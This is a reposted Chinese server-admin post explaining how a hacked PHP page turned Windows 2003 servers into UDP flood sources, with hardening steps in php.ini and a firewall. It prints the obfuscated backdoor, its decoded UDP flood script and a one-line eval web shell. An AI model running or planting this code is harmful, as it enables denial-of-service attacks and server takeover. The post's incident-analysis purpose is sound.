win2003遭受udp攻擊導(dǎo)致帶寬占用很大
以下為轉(zhuǎn)帖:
關(guān)于近期一些服務(wù)器遭受UDP攻擊的說(shuō)明
近來(lái)我有一兩臺(tái)服務(wù)器顯示經(jīng)常受到udp攻擊
導(dǎo)致服務(wù)器帶寬占用到100%,用華盾查流量占用也無(wú)法查到具體是哪個(gè)站被攻擊了,起初以為是cc攻擊,因?yàn)橥V沽薸is帶寬就為0了,其實(shí)不然,都是部分用戶(hù)被入侵導(dǎo)致的
下面我想說(shuō)一下被入侵的原理
用戶(hù)程序中的一個(gè)php頁(yè)面的原代碼:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
經(jīng)過(guò)N次解密后的代碼:
<?php
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand <br><br>\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
<?php eval($_POST[ddos])?>
baidu了一下工作原理:
先把你代碼放到一個(gè)正常的網(wǎng)頁(yè)中.
通過(guò)url傳遞IP和端口以u(píng)dp的方式打開(kāi).傳遞文件到服務(wù)器寫(xiě)出.
這樣服務(wù)器就中招了.
也就是服務(wù)器顯示udp攻擊,帶寬占用非常之嚴(yán)重,基本是100%,一般徘徊在97%-99%之間
解決方案:
在php.ini中限制php用網(wǎng)絡(luò)。
在php.ini里設(shè)其值為Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;號(hào)一定要有,意思就是限制用sockets.dll
然后重啟IIS
我沒(méi)關(guān)這個(gè)函數(shù),有的程序需要貌似,直接把udp出站端口給封了.
相關(guān)文章
Win2008遠(yuǎn)程控制確保安全的設(shè)置技巧
在規(guī)模稍微大一些的局域網(wǎng)工作環(huán)境中,網(wǎng)絡(luò)管理員時(shí)常會(huì)采用遠(yuǎn)程控制方式來(lái)管理服務(wù)器或重要工作主機(jī);2009-10-10windows server 2012 服務(wù)器打開(kāi)系統(tǒng)遠(yuǎn)程功能(圖文)
我們可以通過(guò)Windows server 2012服務(wù)器開(kāi)啟遠(yuǎn)程控制來(lái)進(jìn)行遠(yuǎn)程辦公或游戲,本文就來(lái)介紹windows server 2012 服務(wù)器打開(kāi)系統(tǒng)遠(yuǎn)程功能,感興趣的可以了解一下2023-10-10Windows server 2008搭建php運(yùn)行環(huán)境圖文詳解(php5.3)
這篇文章主要為大家分享下Windows server 2008搭建php運(yùn)行環(huán)境的步驟,需要的朋友可以參考下2013-12-12國(guó)內(nèi)首款同時(shí)支持自定義404/505/rewrite的asp服務(wù)器(netbox制作,開(kāi)放源代碼)
國(guó)內(nèi)首款同時(shí)支持自定義404/505/rewrite的asp服務(wù)器(netbox制作,開(kāi)放源代碼)...2007-09-09IIS服務(wù)器中 ASP.NET State Service 開(kāi)啟后 Session 仍容易丟失的問(wèn)題終極解決辦法
IIS服務(wù)器中 ASP.NET State Service 開(kāi)啟后 Session 仍容易丟失的問(wèn)題終極解決辦法,碰到此問(wèn)題的朋友可以參考下。2011-07-07IIS 6.0 中修改注冊(cè)表自定義 Httperr.Log
在 Windows 2003 Server 中.IIS 6.0 的日志記錄比 IIS 5.0 要更強(qiáng)大和安全.我們可以通過(guò)設(shè)置日志文件的路徑來(lái)將日志保存在其他地方.比如D盤(pán).因?yàn)槿绻愕?IIS 服務(wù)器流量很大.那放在默認(rèn)的C盤(pán)可能會(huì)大量占用硬盤(pán)空間2014-01-01IIS6.0 silverlight網(wǎng)站部署方法
在windows2003上通過(guò)IIS6.0部署一個(gè)silverlight網(wǎng)站與部署其他網(wǎng)站基本一致,但是有幾點(diǎn)特別需要注意的地方,掌握了這幾個(gè)小竅門(mén),就可以輕松部署你的silverlight網(wǎng)站了。2009-10-10Windows 2008 R2 下IIS7.5+PHP5.2環(huán)境配置(FastCgi設(shè)置)
這篇文章主要介紹了Windows 2008 R2 下IIS7.5+PHP5.2環(huán)境配置(FastCgi設(shè)置),需要的朋友可以參考下2016-06-06